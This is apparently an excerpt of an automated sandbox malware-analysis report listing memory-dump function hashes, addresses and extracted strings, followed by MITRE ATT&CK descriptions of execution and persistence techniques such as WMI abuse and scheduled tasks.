Instruction Fuzzy Hash: 50E09272B002289FC740EB99E450B9EBBF9EB44A64F004059EA09C3384DF30AC408790

Function 068F32BD Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2368761125.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_68f0000_QntRsaVyLKlY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d725b938f57d52652dccb17e6f648440a54ddd511f9244ac267f95ecc1ab7e9
Instruction ID: 0e8766f5487f93f0c6039363a5a8a698d3231581a65b808d7dcb74c249307336
Opcode Fuzzy Hash: 7d725b938f57d52652dccb17e6f648440a54ddd511f9244ac267f95ecc1ab7e9
Instruction Fuzzy Hash: 29F0E531604684AFDB01CB69D8449DEBFB6EF89228F14C1A9E58597141C7306B42CB81

Function 068F87F8 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2368761125.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_68f0000_QntRsaVyLKlY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5836319c83b95e3ae9d8e1c8224864bcff1374db2e560fb14f7d95801aa1cd6
Instruction ID: b14b8893e5d5e28fd1591cd5214cca7306402b861c4b668c3be72438b4c289cc
Opcode Fuzzy Hash: c5836319c83b95e3ae9d8e1c8224864bcff1374db2e560fb14f7d95801aa1cd6
Instruction Fuzzy Hash: FCE0ED71E001199FCB80EFBC990559E77F5EF48254B1040A5D60AD7311EA309A108BE1

Function 068F0DB0 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2368761125.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_68f0000_QntRsaVyLKlY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 872271943f060b6fbd428965aac37a94c3d8898412ea2707b354a6ed696afba5
Instruction ID: 493c2d7a6d58b35e6504f077bd3effff7b7427455dd5fb0745ee0c8ef6e8e4ea
Opcode Fuzzy Hash: 872271943f060b6fbd428965aac37a94c3d8898412ea2707b354a6ed696afba5
Instruction Fuzzy Hash: 1EE092B2B402444FD754AAA8859472A7B82AF59341F554599D245CB3E9DE21EC01C300

Function 068F0DC0 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2368761125.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_68f0000_QntRsaVyLKlY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b6fb6effd11b904206cefe87987a731700939f4abd037f414c22a9843c5b52f
Instruction ID: e831b0f78fd6046a23d10d6bf70a264dad6eda755189462bbf1d1a44818d18e5
Opcode Fuzzy Hash: 9b6fb6effd11b904206cefe87987a731700939f4abd037f414c22a9843c5b52f
Instruction Fuzzy Hash: CAE0DF327902084FC314AAAC9414B6A77C9AF48360F44416AE301CB395CE60EC40C394

Function 02DD0871 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2351473050.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2dd0000_QntRsaVyLKlY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06384279b04eca01e5ed1ee0418e534deaabdcdc52442f9377b071a8f60636d5
Instruction ID: bddad07cebc072f2669d924d073a83d0e496ef47d7811b8c6e022c70e9b3e2a0
Opcode Fuzzy Hash: 06384279b04eca01e5ed1ee0418e534deaabdcdc52442f9377b071a8f60636d5
Instruction Fuzzy Hash: 5DF030B42087864FCB13EB28E8D09857FB8EF413047455EA9E0828B52BD664688ACB80

Function 068FAC80 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2368761125.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_68f0000_QntRsaVyLKlY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d86c8c0bd8fb0573c382573f53ad7ce4986d3a1958cf956f2d4ad74490ff8e31
Instruction ID: b44104a20a3a45550cc5d6867e6d21563a6202f4b7cd8997ec81976f788f8c12
Opcode Fuzzy Hash: d86c8c0bd8fb0573c382573f53ad7ce4986d3a1958cf956f2d4ad74490ff8e31
Instruction Fuzzy Hash: 72E0C2726083A42FC316EA6C88109CF7FAE8D9602070941EBD18ACB243D9602A0083AB

Function 068F0AC8 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2368761125.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_68f0000_QntRsaVyLKlY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 421ed7879ca6881f4d7a1c0b497794691be0642bb528250bf7f5d452da5c7960
Instruction ID: 77dd85f4714eae33ceca4eed140c195d08397509be97bf38c951cb5c4bfbfce8
Opcode Fuzzy Hash: 421ed7879ca6881f4d7a1c0b497794691be0642bb528250bf7f5d452da5c7960
Instruction Fuzzy Hash: FEE01A71E14218AF9BC0EFBC99155EEBBF9AF58210B108166E559E7201EB309E10CBD1

Function 068FC008 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2368761125.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_68f0000_QntRsaVyLKlY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2aa85c21757f6f85b6f8ec0c77ccac5f157c36ed6810633f3d0be0ae0e920de
Instruction ID: 376ff0d39063d3b2f3fe1844d17c757d180fabfe8cc53c2241b6ba438c280f6c
Opcode Fuzzy Hash: a2aa85c21757f6f85b6f8ec0c77ccac5f157c36ed6810633f3d0be0ae0e920de
Instruction Fuzzy Hash: 42E08661B282484FDAD6B3685911A2F3656DFC1604B15008A8A05CA297DA98CE42C277

Function 068FAAA8 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2368761125.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_68f0000_QntRsaVyLKlY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d49227b90a134a9db689a3e9971e6a670b5fb760f93965a9279f09f8fed7309
Instruction ID: e9fa2cc002862f859106ac5e1bff9a3d106f46957b510be6e97d875c52d65338
Opcode Fuzzy Hash: 2d49227b90a134a9db689a3e9971e6a670b5fb760f93965a9279f09f8fed7309
Instruction Fuzzy Hash: 39E026307342488FCBAAA364272133F3A9A9BC2614B110086DF16CE297EB64CC458F73

Function 02DD9810 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2351473050.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2dd0000_QntRsaVyLKlY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf83c1878a1752966799d07e6fb18290b8d193427c6b3caef57f8e7c87ab123e
Instruction ID: 18294f40d1e8a6cca6de2ce7c23b4fc5769454bb16ef7cd80f63f95fc5b5efad
Opcode Fuzzy Hash: cf83c1878a1752966799d07e6fb18290b8d193427c6b3caef57f8e7c87ab123e
Instruction Fuzzy Hash: A7D05E336446146BCB04AF98A8416CA7FAAD7C5521F0044EAD94983241EE72AD0483D9

Function 02DD43CF Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2351473050.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2dd0000_QntRsaVyLKlY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c26b632ca9ee08c332299e078b93d54fc04935e3491284470e568924dfdfdfcd
Instruction ID: f288bf7f753c68931f3d75a6fd6da1f8b4063e7f732b4f1706b5cce5c9097762
Opcode Fuzzy Hash: c26b632ca9ee08c332299e078b93d54fc04935e3491284470e568924dfdfdfcd
Instruction Fuzzy Hash: 28E04636600409CBC705AB58F9A87D837B6EF44B00F450A96D90197748EB39AC92CF98

Function 02DD36D8 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2351473050.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2dd0000_QntRsaVyLKlY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4a0e9f16bbf169b7657d58dddfe0704f08212a81d9427e45c2615e49d5b3e04
Instruction ID: c529410501c7388306489d8f74571d7169ec393ee1f50ed181e028a09751512f
Opcode Fuzzy Hash: c4a0e9f16bbf169b7657d58dddfe0704f08212a81d9427e45c2615e49d5b3e04
Instruction Fuzzy Hash: 09E0CD20254014DBD384674CF47478B3B66D7C8705F0084A5A90087349EF355C0267D2

Function 02DD9630 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2351473050.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2dd0000_QntRsaVyLKlY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 167e13a9055794b40a8e04ce25cf993199261cf4d536287b20dd947f57e41ebe
Instruction ID: 91fff6e103e1b4ad8972de356e20952c66069e49d7e980261129b854c5ccce74
Opcode Fuzzy Hash: 167e13a9055794b40a8e04ce25cf993199261cf4d536287b20dd947f57e41ebe
Instruction Fuzzy Hash: 15E08C35B004008FC710AFBCA509ADD3BB8AB04205B5104A5E905C7228EB31CC14CB41

Function 02DDCD58 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2351473050.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2dd0000_QntRsaVyLKlY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff3f9eccff80d15dd022f879e78ba71b3878c3dbf6e583e6d9511a8519a35909
Instruction ID: 45e2735f983f6ba8c06f2d0fedaab4beb977b101addb73f857a5cd7b221ba77f
Opcode Fuzzy Hash: ff3f9eccff80d15dd022f879e78ba71b3878c3dbf6e583e6d9511a8519a35909
Instruction Fuzzy Hash: ECE092B1D0420D9F8B84DFA9D8419BEBFF8AB48201F10816AE958E2340E6349A51CFE5

Function 068F6153 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2368761125.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_68f0000_QntRsaVyLKlY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30b02310cc91c8ee81bf0d0186c0ad312c33fba6fc4bad2890fbadc6fec53a57
Instruction ID: 76abbcb1f21f4252e90532f0dfcad14d6d30e5cccaae176947f56159f6aa4d82
Opcode Fuzzy Hash: 30b02310cc91c8ee81bf0d0186c0ad312c33fba6fc4bad2890fbadc6fec53a57
Instruction Fuzzy Hash: 6ED05E1174E2951FE787A368B43066A2F9ADBC2654F0940EBD284CB2EBC9588C1997B1

Function 068FE8C0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2368761125.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_68f0000_QntRsaVyLKlY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79dd4448c229a10ef21bafedcc7217d03b627a24da206bdca8f193e38b038436
Instruction ID: e5ab0f1136646335b9ef047b392fb74e9ebfdb74973b711a94995524be512d6e
Opcode Fuzzy Hash: 79dd4448c229a10ef21bafedcc7217d03b627a24da206bdca8f193e38b038436
Instruction Fuzzy Hash: 26D0A93102B3962BC302DA28D9808D23FA98E0A24030942E2E499CB532C6280DA28BB0

Function 02DD0839 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2351473050.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2dd0000_QntRsaVyLKlY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e1779d1f7962e6698a41b3d08d74c8a3bcdc97e577692b4f7001ed0ed6e4004
Instruction ID: 37e7249a0120ff6fcf8117a9b2efd9fe0b3020f72ca923645e56378ae5e8070a
Opcode Fuzzy Hash: 2e1779d1f7962e6698a41b3d08d74c8a3bcdc97e577692b4f7001ed0ed6e4004
Instruction Fuzzy Hash: 70D05B219492904FC7016B6874190A87F65DD4762074A45DADD4997351DD060D1683D3

Function 02DD3E60 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2351473050.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2dd0000_QntRsaVyLKlY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc11084bcc38b082473a9fa3f92c06fa0d719c74a46d2533907842e45798ddc1
Instruction ID: 852ea02d102ed1e859799c770b96984cb4d3f7a2fc80f53031df6288360cafee
Opcode Fuzzy Hash: bc11084bcc38b082473a9fa3f92c06fa0d719c74a46d2533907842e45798ddc1
Instruction Fuzzy Hash: 4AE0DF329095888FC702EB38E4215C83FB2DF01201B080886DC01AB389DB34AC89CBE5

Function 02DDA850 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2351473050.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2dd0000_QntRsaVyLKlY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1cc4d7d1f38e39852897af56d1e91f44881a33a64b9b46541264d90b497e88e
Instruction ID: c866b67a8fdd7bbdd8c06e9eeccf0ce8d393fec16ebe43808c374de17d84c32d
Opcode Fuzzy Hash: b1cc4d7d1f38e39852897af56d1e91f44881a33a64b9b46541264d90b497e88e
Instruction Fuzzy Hash: 56E04F256404448FEB19DF25D1257467BB6EF44301F40C45B984043318DE39DC0ADB45

Function 02DD9820 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2351473050.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2dd0000_QntRsaVyLKlY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fcb9be8439d513d3a9c4f9215b471aabc3aed0544276bd94c3d7ca13c378825
Instruction ID: 9fc5180fe8e45bcf717522696846c0f15207f17805685c0c449325044debc820
Opcode Fuzzy Hash: 2fcb9be8439d513d3a9c4f9215b471aabc3aed0544276bd94c3d7ca13c378825
Instruction Fuzzy Hash: FCD01272B046282B4705EEAD58504DE7FAECA85170B4040BED909D7242EE716E4442DA

Function 02DD0848 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2351473050.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2dd0000_QntRsaVyLKlY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23b65e872c5e8aadb6ffc21ef8430f129bb232ddb79838c3a056cb1cd5b927bb
Instruction ID: ef58f70589ad509d97a184139dc41f0eaad973acc7ea5a3c2144bf7df2b1a3be
Opcode Fuzzy Hash: 23b65e872c5e8aadb6ffc21ef8430f129bb232ddb79838c3a056cb1cd5b927bb
Instruction Fuzzy Hash: FDC08C31B90124978A0436AC78185BD378EDA8AA617C6455AE90AC3380EE061C1007EB

Function 02DD34F8 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2351473050.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2dd0000_QntRsaVyLKlY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94bc203b4a448a01abfc25fe65917f50902a68a98ce69fd89d94fb3799f037c9
Instruction ID: 37bfda458aaa4826f30b20940b717be7511445678afa356eb40f3ef1ae33c361
Opcode Fuzzy Hash: 94bc203b4a448a01abfc25fe65917f50902a68a98ce69fd89d94fb3799f037c9
Instruction Fuzzy Hash: 98C08C14280528C3C3422B49580034C7622E384B02FC008E885844B3D0EE2ABC0952A6

Function 02DD97F1 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2351473050.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2dd0000_QntRsaVyLKlY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48ebf4b79a53a8ea0a0b691fc73222823d1b4621eab34b2e67b8c607ba3da898
Instruction ID: b1f71a6e109f2f451ecb2bc010664659f08d65ba662bd40782fb717389fff9d0
Opcode Fuzzy Hash: 48ebf4b79a53a8ea0a0b691fc73222823d1b4621eab34b2e67b8c607ba3da898
Instruction Fuzzy Hash: A3B0921AA9154287DF053B20F00A3943E25E7A1E02F118DA4AC8242360EE7A98008780

Non-executed Functions

Function 068F5953 Relevance: 15.1, Strings: 12, Instructions: 143COMMON

Download Yara Rule

Strings

`Qeq, xrefs: 068F59C4
`Qeq, xrefs: 068F5A18
`Qeq, xrefs: 068F5AF0
`Qeq, xrefs: 068F59EE
`Qeq, xrefs: 068F599A
`Qeq, xrefs: 068F5A42
`Qeq, xrefs: 068F5A9A
`Qeq, xrefs: 068F5AC4
`Qeq, xrefs: 068F5973
`Qeq, xrefs: 068F5A6E
`Qeq, xrefs: 068F5B48
`Qeq, xrefs: 068F5B1C

Memory Dump Source

Source File: 00000016.00000002.2368761125.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_68f0000_QntRsaVyLKlY.jbxd

Similarity

API ID:
String ID: `Qeq$`Qeq$`Qeq$`Qeq$`Qeq$`Qeq$`Qeq$`Qeq$`Qeq$`Qeq$`Qeq$`Qeq
API String ID: 0-4221963129
Opcode ID: aeed1a0c9eb7e656a4efc5bdf29e0cf546cfcf96e6ec0bd60d9d3ce3c08b8430
Instruction ID: b095eef290d87c1135551c0b298347e8b299da8baf4b0592ab88c7e08b62eb98
Opcode Fuzzy Hash: aeed1a0c9eb7e656a4efc5bdf29e0cf546cfcf96e6ec0bd60d9d3ce3c08b8430
Instruction Fuzzy Hash: 31514870E0020E9FDB45EFA4E951BAE7B76FF80300F608519E9042B3C9EA752D458FA0

Function 068F5960 Relevance: 15.1, Strings: 12, Instructions: 140COMMON

Download Yara Rule

Strings

`Qeq, xrefs: 068F59C4
`Qeq, xrefs: 068F5A18
`Qeq, xrefs: 068F5AF0
`Qeq, xrefs: 068F59EE
`Qeq, xrefs: 068F599A
`Qeq, xrefs: 068F5A42
`Qeq, xrefs: 068F5A9A
`Qeq, xrefs: 068F5AC4
`Qeq, xrefs: 068F5973
`Qeq, xrefs: 068F5A6E
`Qeq, xrefs: 068F5B48
`Qeq, xrefs: 068F5B1C

Memory Dump Source

Source File: 00000016.00000002.2368761125.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_68f0000_QntRsaVyLKlY.jbxd

Similarity

API ID:
String ID: `Qeq$`Qeq$`Qeq$`Qeq$`Qeq$`Qeq$`Qeq$`Qeq$`Qeq$`Qeq$`Qeq$`Qeq
API String ID: 0-4221963129
Opcode ID: 9321d28e5a5c3d37341997884b2926ff5194f942133992f19b771496602a3ccc
Instruction ID: a55a7e793d7f10f405cc59d4c2995eeff05025c70a72d8e396bed544b00d91c5
Opcode Fuzzy Hash: 9321d28e5a5c3d37341997884b2926ff5194f942133992f19b771496602a3ccc
Instruction Fuzzy Hash: 4F512970E0020E9FDB45EFA4E951BAE7776FF80300F608519E9042B7D9EA752D458FA4

Function 06940D50 Relevance: 10.3, Strings: 8, Instructions: 295COMMON

Download Yara Rule

Strings

$eq, xrefs: 06940E42
$eq, xrefs: 06940F76
$eq, xrefs: 06940F00
$eq, xrefs: 06940DCC
$eq, xrefs: 06940E4E
$eq, xrefs: 06940F82
$eq, xrefs: 06940F50
$eq, xrefs: 06940E1C

Memory Dump Source

Source File: 00000016.00000002.2368900315.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6940000_QntRsaVyLKlY.jbxd

Similarity

API ID:
String ID: $eq$$eq$$eq$$eq$$eq$$eq$$eq$$eq
API String ID: 0-1110479544
Opcode ID: d60f3a3760493a45d29e8f4e0d19e797f04c59735290882057b585d61eb75b92
Instruction ID: 9174ccc79f94fc815656cbc9df08a9d8d605864335691fae0e3d11ff2f45e6c6
Opcode Fuzzy Hash: d60f3a3760493a45d29e8f4e0d19e797f04c59735290882057b585d61eb75b92
Instruction Fuzzy Hash: 28B19030B102058FDB55EB69C954ABEBBF7BF89200B24846AE906C77A1DB31DC51CB91

Function 068FC6BB Relevance: 9.2, Strings: 7, Instructions: 471COMMON

Download Yara Rule

Strings

$eq, xrefs: 068FC7A3
(_eq, xrefs: 068FC91B
$eq, xrefs: 068FC9EF
$eq, xrefs: 068FC7F9
$eq, xrefs: 068FCB83
$eq, xrefs: 068FC84F
(_eq, xrefs: 068FC901

Memory Dump Source

Source File: 00000016.00000002.2368761125.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_68f0000_QntRsaVyLKlY.jbxd

Similarity

API ID:
String ID: (_eq$(_eq$$eq$$eq$$eq$$eq$$eq
API String ID: 0-431739083
Opcode ID: a8cfcad879071c1975af340b9db27f7fa38f07acddaa4677b344f0953a59b91e
Instruction ID: eed47c2ef9f6708f78b0efa3201a0195cbe8d95d3a4f8d141830d6bfb8014e2e
Opcode Fuzzy Hash: a8cfcad879071c1975af340b9db27f7fa38f07acddaa4677b344f0953a59b91e
Instruction Fuzzy Hash: 9F227CB0A00208DFDB55EFA8D850B9E7BBAFF89300F2085A9D505AB3A5DB315D44DF61

Function 068FC6C8 Relevance: 9.2, Strings: 7, Instructions: 464COMMON

Download Yara Rule

Strings

$eq, xrefs: 068FC7A3
(_eq, xrefs: 068FC91B
$eq, xrefs: 068FC9EF
$eq, xrefs: 068FC7F9
$eq, xrefs: 068FCB83
$eq, xrefs: 068FC84F
(_eq, xrefs: 068FC901

Memory Dump Source

Source File: 00000016.00000002.2368761125.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_68f0000_QntRsaVyLKlY.jbxd

Similarity

API ID:
String ID: (_eq$(_eq$$eq$$eq$$eq$$eq$$eq
API String ID: 0-431739083
Opcode ID: bde861f1d6806e85d75189c17ad7f54a9766236e5851858c923ca11db49a3dc5
Instruction ID: 8c5f4387f2965b0f986c51dcf69e7ec3638f15619b28512db70246d850203a54
Opcode Fuzzy Hash: bde861f1d6806e85d75189c17ad7f54a9766236e5851858c923ca11db49a3dc5
Instruction Fuzzy Hash: 79226DB0A00208DFDB55EFA8D850B9E7BBAFF88300F6085A9D505AB3A5DB315D44DF61

Function 02DD5FD8 Relevance: 7.9, Strings: 6, Instructions: 420COMMON

Download Yara Rule

Strings

(_eq, xrefs: 02DD60C1
(_eq, xrefs: 02DD6342
(_eq, xrefs: 02DD6241
(_eq, xrefs: 02DD63C1
(_eq, xrefs: 02DD6042
(_eq, xrefs: 02DD61C2

Memory Dump Source

Source File: 00000016.00000002.2351473050.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2dd0000_QntRsaVyLKlY.jbxd

Similarity

API ID:
String ID: (_eq$(_eq$(_eq$(_eq$(_eq$(_eq
API String ID: 0-3780371842
Opcode ID: a4186eefd4c57f8444af81b80ccc87b410a89368633bd804d5f89601a76acf16
Instruction ID: 9eeb5252945471c3980f686cfa86da3f36a9ce921a0d14649054654b28573621
Opcode Fuzzy Hash: a4186eefd4c57f8444af81b80ccc87b410a89368633bd804d5f89601a76acf16
Instruction Fuzzy Hash: A8E19174A00644AFCB04AF78D4146AE7FB6EF85310F64846AE8469B381EF35ED46CBD1

Function 068FBAD9 Relevance: 6.5, Strings: 5, Instructions: 280COMMON

Download Yara Rule

Strings

$eq, xrefs: 068FBC33
(_eq, xrefs: 068FBBAD
$eq, xrefs: 068FBDFC
(_eq, xrefs: 068FBBC7
$eq, xrefs: 068FBB56

Memory Dump Source

Source File: 00000016.00000002.2368761125.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_68f0000_QntRsaVyLKlY.jbxd

Similarity

API ID:
String ID: (_eq$(_eq$$eq$$eq$$eq
API String ID: 0-1691093998
Opcode ID: 49b4134bbf4dc9b187bbd3ae6e1e76d70b51bc1182d21abb353dfa08e2f1a4d9
Instruction ID: aabc9302b8607db5735867ccb3be62253ee727a526ec45479832c73ec9cb7060
Opcode Fuzzy Hash: 49b4134bbf4dc9b187bbd3ae6e1e76d70b51bc1182d21abb353dfa08e2f1a4d9
Instruction Fuzzy Hash: 05C14CB0D002089FCB45EFA9D850ADE7BBAFF88304F508469D405AB395DB75AD09DF61

Function 068FBAE8 Relevance: 6.5, Strings: 5, Instructions: 273COMMON

Download Yara Rule

Strings

$eq, xrefs: 068FBC33
(_eq, xrefs: 068FBBAD
$eq, xrefs: 068FBDFC
(_eq, xrefs: 068FBBC7
$eq, xrefs: 068FBB56

Memory Dump Source

Source File: 00000016.00000002.2368761125.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_68f0000_QntRsaVyLKlY.jbxd

Similarity

API ID:
String ID: (_eq$(_eq$$eq$$eq$$eq
API String ID: 0-1691093998
Opcode ID: 75843bd41884c715c3e2acc5d01f20a793e57a2d609fc37a23254c3b8b1a9297
Instruction ID: d38fa1988216f2d6e839e00f97d79f04476bf695684ba905801a005bcf0dc75d
Opcode Fuzzy Hash: 75843bd41884c715c3e2acc5d01f20a793e57a2d609fc37a23254c3b8b1a9297
Instruction Fuzzy Hash: 07C14DB0D002089FCB45EFA9D890ADE7BBAFF88304F508469D405AB395DB75AD09DF60

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
